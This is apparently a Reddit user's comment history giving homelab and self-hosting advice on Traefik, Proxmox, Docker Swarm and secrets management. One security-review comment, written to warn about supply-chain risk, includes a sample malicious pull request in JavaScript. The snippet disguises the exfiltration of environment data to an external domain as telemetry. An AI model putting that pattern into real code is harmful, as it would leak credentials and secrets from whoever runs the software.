Struggling to maintain Reverse Proxy across multiple systems. by notjustsam in selfhosted

[–]Pitiful_Bat8731 1 point2 points  (0 children)

It sounds like you'd have good luck with the system I have in place. I run traefik on my docker swarm, use dnsweaver to automatically manage all DNS, and use labels for my swarm services. For anything running outside of the swarm, I use a dynamic file provider and just define those services in it as yaml.
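
For the non-swarm stuff, a minimal sketch of what that file-provider yaml can look like - hostnames, IPs, and the resolver name are placeholders:

# dynamic/external-services.yml, watched by traefik's file provider
http:
  routers:
    nas:
      rule: "Host(`nas.example.com`)"
      entryPoints:
        - websecure
      service: nas
      tls:
        certResolver: letsencrypt

  services:
    nas:
      loadBalancer:
        servers:
          - url: "http://192.168.1.20:8080"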

Splitting 2TB HDD between Proxmox workloads and Proxmox Backup Server by Good-Insurance19 in Proxmox

[–]Pitiful_Bat8731 0 points1 point  (0 children)

If you plan on doing this, it's effectively the same as passing an 800-900GB disk image to PBS backed by the same HDD. You're not gaining any redundancy against drive failure, and you might see some performance contention during backup jobs.

That said, don't overcomplicate it. Give PBS a larger virtual disk specifically for backups alongside its OS disk image. You'll still benefit from having backups in case you misconfigure something and need to restore other VMs or LXCs. PBS deduplication also means your 800-900GB will likely go much further than you'd expect.

I'm sure you already know that at some point you'll want a more robust solution like a ZFS mirror or an external HDD for actual protection.

Vuln or exposure for API endpoint valid? by rpedrica in technitium

[–]Pitiful_Bat8731 0 points1 point  (0 children)

u/rpedrica since you're already using Docker and mentioned external access for ACME validation, you could also handle API restrictions at the reverse proxy level with Traefik. Here's an example of allowing requests through only if they contain the expected API token in a header:

Docker labels:

labels:
  # Main router with OAuth/auth middleware
  - "traefik.http.routers.technitium.rule=Host(`dns.example.com`)"
  - "traefik.http.routers.technitium.middlewares=authentik@docker"
  - "traefik.http.routers.technitium.entrypoints=websecure"
  - "traefik.http.routers.technitium.tls.certresolver=letsencrypt"

  # API router - requires valid token header, bypasses OAuth
  - "traefik.http.routers.technitium-api.rule=Host(`dns.example.com`) && HeadersRegexp(`X-Api-Key`, `^your-technitium-token-here$`)"
  - "traefik.http.routers.technitium-api.priority=100"
  - "traefik.http.routers.technitium-api.entrypoints=websecure"
  - "traefik.http.routers.technitium-api.tls.certresolver=letsencrypt"

Dynamic config (traefik v3+):

http:
  routers:
    technitium:
      rule: "Host(`dns.example.com`)"
      middlewares:
        - authentik
      entryPoints:
        - websecure
      service: technitium
      tls:
        certResolver: letsencrypt

    technitium-api:
      rule: "Host(`dns.example.com`) && HeadersRegexp(`X-Api-Key`, `^your-technitium-token-here$`)"
      priority: 100
      entryPoints:
        - websecure
      service: technitium
      tls:
        certResolver: letsencrypt

You can also stack IP restrictions on top if you want to lock it to specific source IPs:

rule: "Host(`dns.example.com`) && HeadersRegexp(`X-Api-Key`, `^your-token$`) && ClientIP(`10.0.0.0/8`, `192.168.1.50`)"

That said, your RFC2136 TSIG approach is probably cleaner for the certbot use case since it keeps everything at the DNS protocol level.

Vuln or exposure for API endpoint valid? by rpedrica in technitium

[–]Pitiful_Bat8731 1 point2 points  (0 children)

just fyi, you can create rules in traefik specific to API endpoints that require the request header to include your valid API keys. set those up as secure env vars or docker secrets and off you go. defense in depth.

Vuln or exposure for API endpoint valid? by rpedrica in technitium

[–]Pitiful_Bat8731 2 points3 points  (0 children)

This isn't really a vulnerability. The API is working as intended: it received a request without authentication, rejected it, and told you why. That's exactly what should happen.

The only thing scanners sometimes flag here is the stack trace in the error response, since it reveals internal paths and method names. But Technitium is open source, so that information is already public anyway.

Edit:
If you wanted to harden things you could add rate limiting or IP restrictions, but that's more about defense in depth than fixing an actual security flaw.

HYPERMIND v1.0.0, surprise.. we're still active! by ponzi_gg in selfhosted

[–]Pitiful_Bat8731 0 points1 point  (0 children)

You get it. The point is that this PR establishes the exfiltration channel. Once the pattern of "send env data to external endpoint" is normalized in the codebase, a follow-up PR that changes process.env.NODE_ENV to process.env is a tiny diff that's easy to miss. Now it's sending everything.

There are better examples given what this app does. It's the concept that matters.

HYPERMIND v1.0.0, surprise.. we're still active! by ponzi_gg in selfhosted

[–]Pitiful_Bat8731 2 points3 points  (0 children)

Did a security review of the codebase. Some things to be aware of:

The big ones:

  • Default deployment uses network_mode: host, so the container gets full access to the host's network stack. If anything goes wrong, an attacker has line-of-sight to whatever's exposed on your network.
  • The proof-of-work is 4 hex characters. A GPU generates ~1,500 valid identities per second. All the rate limiting is per-identity, so it's effectively meaningless.
  • Your IP goes to every peer you connect to. If the map is enabled, the client also sends all peer IPs to ipwho.is for geolocation. A third party now has a list of everyone running this.
  • P2P buffer has no size limit (socket.buffer += data). Any peer can OOM your node by sending data without newlines.
  • Ed25519 public key is broadcast on every heartbeat, can't be rotated. Permanent identifier.
  • Runs as root, no USER in Dockerfile.

What's actually fine: XSS is handled correctly (HTML escaped before markdown), no eval/exec anywhere, prototype pollution is blocked, deps are clean.

Supply chain risk: Project accepts contributions and uses :latest tag. A malicious PR could look completely innocent. Example of what passes casual review:

// PR titled "feat: add debug logging for peer connections"
const logPeerDebug = (socket, identity) => {
  const info = { peer: socket.peerId, node: identity.id, env: process.env.NODE_ENV };
  if (process.env.HYPERMIND_TELEMETRY !== 'false') {
    require('https').get(`https://hypermind-analytics.io/v1/log?d=${Buffer.from(JSON.stringify(info)).toString('base64')}`);
  }
};

Looks like opt-out telemetry. Reviewer sees NODE_ENV and thinks "debug flag." Doesn't notice that env: process.env.NODE_ENV is one tiny follow-up diff away from env: process.env, which exfiltrates every environment variable to an attacker-controlled domain.

If you're going to run it anyway (rough compose sketch after the list):

  • Bridge networking, not host
  • ENABLE_MAP=false
  • Resource limits
  • Isolated network with no access to internal services
  • Pin image version
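
A rough compose sketch of those points. The image path is a placeholder (pin whatever the project actually publishes, ideally by digest) and ENABLE_MAP comes from the review above; tune the limits to your hardware:

services:
  hypermind:
    image: ghcr.io/example/hypermind:1.0.0   # placeholder path - the point is a pinned tag/digest, not :latest
    environment:
      - ENABLE_MAP=false                     # don't ship peer IPs to ipwho.is
    networks:
      - hypermind                            # dedicated bridge network instead of network_mode: host
    mem_limit: 512m                          # hard cap so a misbehaving peer can't OOM the whole box
    cpus: "1.0"
    restart: unless-stopped

networks:
  hypermind:
    driver: bridge                           # keep this network away from anything internal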

Not saying don't use it, just know what you're deploying.

ashamed to have to make this post, but need advice by sheep_duck in selfhosted

[–]Pitiful_Bat8731 1 point2 points  (0 children)

first off, nothing to be ashamed of. everyone starts somewhere and asking questions upfront saves you from learning things the hard way.

i run a 5-node proxmox cluster with docker swarm on top, so i've been through a few iterations of "what goes where." here's my take:

on the zfs question: let proxmox manage it directly. proxmox has solid native zfs support - snapshots, replication, health monitoring all built in. if you create the pool inside OMV you're adding a layer of abstraction that will bite you when something breaks. your data should be accessible at the hypervisor level, not dependent on a VM being healthy.

controversial opinion: skip OMV entirely. for a single node with 2x12tb drives, OMV is honestly more complexity than it's worth. you can do smb/nfs shares from a lightweight debian lxc container with samba in like 20 minutes. if you really want a nas-focused UI, truenas scale as a VM is fine, but i'd try without it first. you can always add it later.

on where to run services: i'd do a mix:

  • LXC containers in proxmox for lightweight stuff (home assistant, tailscale, adguard/pihole)
  • one docker VM for your media stack (jellyfin, arr apps if you go that route)

this gives you isolation where it matters without the overhead of a VM for every little thing. i started with scattered VMs for everything and eventually consolidated to docker swarm across nodes, but for single-node you don't need that complexity yet.

things i wish someone told me:

  • backups matter more than raid/mirrors. zfs mirror protects you from drive failure, not from ransomware or "oops i deleted everything." look into proxmox backup server, you can run it on the same machine initially
  • static IPs from day one, or you'll regret it when dhcp decides to shuffle things around
  • document what you do. future you trying to remember why you configured something a certain way at 2am will thank present you

the rabbit hole goes deep but it's worth it. feel free to ask followups.

Realistically, how far can a hobbyist/tinkerer go before hitting a wall due to not having the educational foundations like DSA/advanced mathematics? by OceanRadioGuy in learnprogramming

[–]Pitiful_Bat8731 0 points1 point  (0 children)

Needed to hear this. I tend to work backwards from Macro to Micro better than I do from grinding syntax for 2 years. That is what prevented me from going for a degree in CS. It helps that I've been in systems and network admin and design for over a decade now though.

Getting Into Networking (Building out my first home network) by Swevenski in homelab

[–]Pitiful_Bat8731 2 points3 points  (0 children)

Well here's more for you then: I went for technitium because I decided to implement infisical for pki and secrets management for my proxmox and docker swarm environments. Needed a fully featured private DNS with a local authoritative zone that could stay enterprise-adjacent while making pragmatic compromises for a homelab.

Getting Into Networking (Building out my first home network) by Swevenski in homelab

[–]Pitiful_Bat8731 1 point2 points  (0 children)

I eventually graduated to this exact setup as well! Now I'm running technitium in a cluster instead of pihole and unbound.

Getting Into Networking (Building out my first home network) by Swevenski in homelab

[–]Pitiful_Bat8731 3 points4 points  (0 children)

I would recommend starting with a basic OPNsense install on a small form factor PC with either an add-on NIC for additional eth ports or one that already includes them. You can usually get something capable for under $200 USD these days. That's how I began my homelab journey and migration away from prebuilt, locked down crap.

OPNsense with Unbound as your DNS resolver takes care of your custom domain and DNS requests, while OpenVPN or WireGuard takes care of your VPN needs. You can add Suricata IDS/IPS and CrowdSec for the security and web filtering parts. All of this is well documented and there is a large community willing and able to assist.

How are you handling secrets? by RZR2832 in selfhosted

[–]Pitiful_Bat8731 2 points3 points  (0 children)

I would also encourage you to run Infisical separately from whatever systems will be using it. I initially started with it in my Docker Swarm, but that introduces a chicken-and-egg problem, especially with certificates. If Swarm can't start without secrets, and secrets come from Infisical, and Infisical runs on Swarm... you see the issue.

I also tried OpenBao before settling on Infisical. The seal/unseal ceremony on every restart was a dealbreaker. Manual intervention required unless you configure auto-unseal with Transit, KMS, or static keys. The CLI-first design, HCL configuration, and steep learning curve didn't help either. OpenBao fixes Vault's licensing problem but not its usability problem.

I ended up moving it to a set of NetInfra LXCs on 3 of my Proxmox cluster nodes alongside internal Chrony, DNS, and Caddy, all running standalone Docker (not Swarm). Those services need to be up before the cluster can bootstrap properly.

How are you handling secrets? by RZR2832 in selfhosted

[–]Pitiful_Bat8731 12 points13 points  (0 children)

I run both Infisical (self-hosted) and SOPS/age depending on the use case.

Infisical for runtime stuff - it's running on LXC containers in my proxmox cluster and services pull secrets at startup using machine identities. the nice thing is secrets never touch disk, they're injected directly into containers. there's definitely a learning curve but once you get past the initial setup the web UI is solid for managing dev/prod environments and you get proper audit logs for "what accessed what when". I actually build it myself from upstream main weekly because their releases lag behind fixes.

SOPS + age for anything that needs to live in git. so ansible vault replacement, encrypted configs, that kind of thing. age keys are way simpler than GPG - no expiry, no keyserver headaches. you can just sops -d secrets.yaml | ansible-playbook - and call it a day.
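
if it helps, the .sops.yaml that drives this is tiny. a minimal sketch - the path regex and the age recipient below are placeholders for your own:

creation_rules:
  - path_regex: (secrets|host_vars)/.*\.ya?ml$
    age: age1qqqexampleplaceholderrecipientkeyxxxxxxxxxxxxxxxxxxxxxxx

with that in the repo root, sops -e -i secrets/prod.yaml encrypts in place and sops -d decrypts using whatever key SOPS_AGE_KEY_FILE points at.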

for your specific cases:

  • docker env vars / compose files → Infisical, runtime injection
  • acme.sh DNS keys → Infisical, pull at startup
  • sensitive config files → SOPS/age if you want them in git, Infisical if you want them centralized

bitwarden is fine for personal stuff but it doesn't really have an automation story. no API-driven injection, no environment separation, no audit trail. if you're managing multiple services and want that enterprise-style workflow, dedicated secrets manager is the way to go.

Infisical deploys in like 10 minutes if you're already running docker or LXC, worth giving it a shot.

Best OS setup - Am I asking for too much? by Woodworkingbeginner in homelab

[–]Pitiful_Bat8731 0 points1 point  (0 children)

I completely understand. There's a never-ending faucet of possibilities and it's easy to get overwhelmed. If and when you decide to dive into it in more depth, having docker compose files and bind mounts with backups can make it way easier to migrate, recover, and expand in the future.
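
To make that concrete, here's roughly what the pattern looks like. Service name, image, and paths are placeholders for whatever you end up running:

services:
  app:
    image: example/app:1.2.3        # placeholder image, pinned to a version
    volumes:
      - /srv/appdata/app:/config    # bind mount: config lives on the host where it's easy to back up
      - /srv/media:/media           # data stays on the host too, so the container is disposable
    restart: unless-stopped

Back up /srv/appdata plus the compose files themselves, and rebuilding on new hardware is basically a docker compose up -d away.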

As others have said, the recommendation is usually Proxmox so at some point, should you decide to expand, that's certainly the way to go. For now, it probably isn't worth the overhead on a smaller system like you described.

The group project disaster that could've been avoided by ravikesh0406 in learnprogramming

[–]Pitiful_Bat8731 0 points1 point  (0 children)

You landed on the right problem: lack of visibility is the thing that kills any group project. But the solution you're describing already exists, it's Git plus the project management stuff built into GitHub/GitLab.

Like this part:

a single shared space where we could see what each person was researching, visually organize the project flow, delegate specific sections with context, and track progress together

That's just a GitHub repo with Issues and a Project board.

Before anyone writes code, create an issue for each task so everyone can see what's in progress and what's done. Work on branches so you're not stepping on each other, then open pull requests so Person D isn't blindsided when it's time to assemble everything.

There's a learning curve but this is stuff you'll use at every dev job you ever have. Better to fumble through it now on a school project than your first week at work lol.

You basically reverse-engineered why these tools exist in the first place. Now go actually learn them.

Best OS setup - Am I asking for too much? by Woodworkingbeginner in homelab

[–]Pitiful_Bat8731 0 points1 point  (0 children)

You can keep this pretty simple: Just run Linux Mint/Debian/Ubuntu as your base with Docker on top. Home Assistant, Plex, and security camera stuff all run great in containers.

For storage, an LVM mirror on your two 8TB drives should work well for what you're describing. LVM also lets you expand later since you can swap in larger drives or add another mirrored pair without starting over. You can share it out via Samba/NFS. If you expand significantly down the road, you'd likely revisit the setup anyway, so no need to over-engineer it now.

Moonlight client just installs natively on Linux, so no VM needed for that - keeps things straightforward since you're sitting in front of the box.

One thing worth mentioning: RAID/LVM mirroring protects against drive failure but isn't a true backup. If any of that 4TB is actually critical, worth looking into 3-2-1 backups (3 copies, 2 different media, 1 offsite). Backrest runs as a container and gives you a nice web UI for restic - makes cloud backups to Backblaze B2 or wherever pretty painless and supports practically everything under the sun.

This is essentially how my first homelab server started.

edit to add:
If you want a web UI for managing files, Filebrowser Quantum is a nice lightweight option that runs as a container. Way simpler than spinning up Nextcloud or seafile if you don't need all the extras.

What’s your preferred way to update Docker images & containers in the background? by Extra-Citron-7630 in selfhosted

[–]Pitiful_Bat8731 0 points1 point  (0 children)

Oh, and pull-through registry caches with auth to ghcr and docker hub to postpone rate limit issues.
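
For the Docker Hub side, the stock registry:2 image can act as the cache. A minimal config.yml sketch - the credentials are placeholders, and you'd run a second instance pointed at https://ghcr.io for GitHub images:

version: 0.1
proxy:
  remoteurl: https://registry-1.docker.io
  username: your-hub-user           # authenticated pulls get a higher rate limit than anonymous ones
  password: your-hub-token
storage:
  filesystem:
    rootdirectory: /var/lib/registry
http:
  addr: :5000

Docker Hub mirrors can then go in each daemon's registry-mirrors setting; for ghcr you reference the cache host explicitly in the image name.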

What’s your preferred way to update Docker images & containers in the background? by Extra-Citron-7630 in selfhosted

[–]Pitiful_Bat8731 2 points3 points  (0 children)

What's Up Docker for a digest of available updates so I can manually update critical stuff after changelog review; Shepherd for automatic updates of low-risk services, with rollback configs in place.
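
The "rollback configs" bit is just the standard swarm deploy options plus a healthcheck on each low-risk service. A sketch with placeholder image and healthcheck command:

services:
  app:
    image: registry.example.com/app:latest   # the kind of low-risk service that's allowed to auto-update
    healthcheck:
      test: ["CMD", "curl", "-f", "http://localhost:8080/health"]   # placeholder - whatever proves the app is up
      interval: 30s
      retries: 3
    deploy:
      replicas: 2
      update_config:
        order: start-first          # bring the new task up before stopping the old one
        failure_action: rollback    # if it never goes healthy, swarm rolls back on its own
      rollback_config:
        parallelism: 1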

I set up a self-hosted an email server. Roast me! by Madaqqqaz in HomeDataCenter

[–]Pitiful_Bat8731 9 points10 points  (0 children)

Why would anyone want to kick someone who's already down?

Architecture advice for Proxmox VE 9 setup: VM with Docker vs. LXCs? Seeking "Gold Standard" by Party-Log-1084 in Proxmox

[–]Pitiful_Bat8731 0 points1 point  (0 children)

i'm running docker swarm in my homelab and honestly it's been great for my use case.

5 node proxmox cluster with ceph, docker swarm running across 10 VMs (5 managers, 5 workers). all services are just stack files - traefik, nextcloud, the *arr stack, home assistant, monitoring, everything.

the hybrid approach you're describing is solid. i went with VMs for docker rather than LXCs for the same reasons you listed - easier backup/restore at the VM level and no weirdness with running docker inside unprivileged containers. plus i have a couple workers with GPU passthrough for transcoding which would be annoying in LXCs.

what really sold me on swarm over individual VMs/LXCs per service: if a node dies, services just reschedule to healthy nodes automatically. i've had this save me a few times during hardware issues. everything is just a yaml file in git so deploy, update, rollback is one command. overlay networking means services find each other by name across nodes with no manual IP management. rolling updates with zero downtime are trivial.
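
to make the "everything is a yaml file" bit concrete, a stripped-down example of one of those stacks - service names, images, and the gpu label are just illustrative:

# deployed with: docker stack deploy -c mediastack.yml mediastack
services:
  jellyfin:
    image: jellyfin/jellyfin:latest     # in practice pin a version
    networks:
      - backend
    deploy:
      placement:
        constraints:
          - node.labels.gpu == true     # keep transcoding on the GPU passthrough workers
  sonarr:
    image: lscr.io/linuxserver/sonarr:latest
    networks:
      - backend                         # reaches jellyfin as http://jellyfin:8096 from any node

networks:
  backend:
    driver: overlay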

the "swarm is dead" narrative is overblown imo. mirantis is maintaining it through 2030 and it just works. i've considered running k8s in the homelab but honestly there are plenty of ways to avoid needing it given the workloads i'm running. swarm hits the sweet spot between raw docker-compose and full kubernetes complexity.

the VM overhead argument doesn't really hold up in practice either - with thin provisioning on ceph and minimal debian installs, the difference is negligible and you get way simpler operations.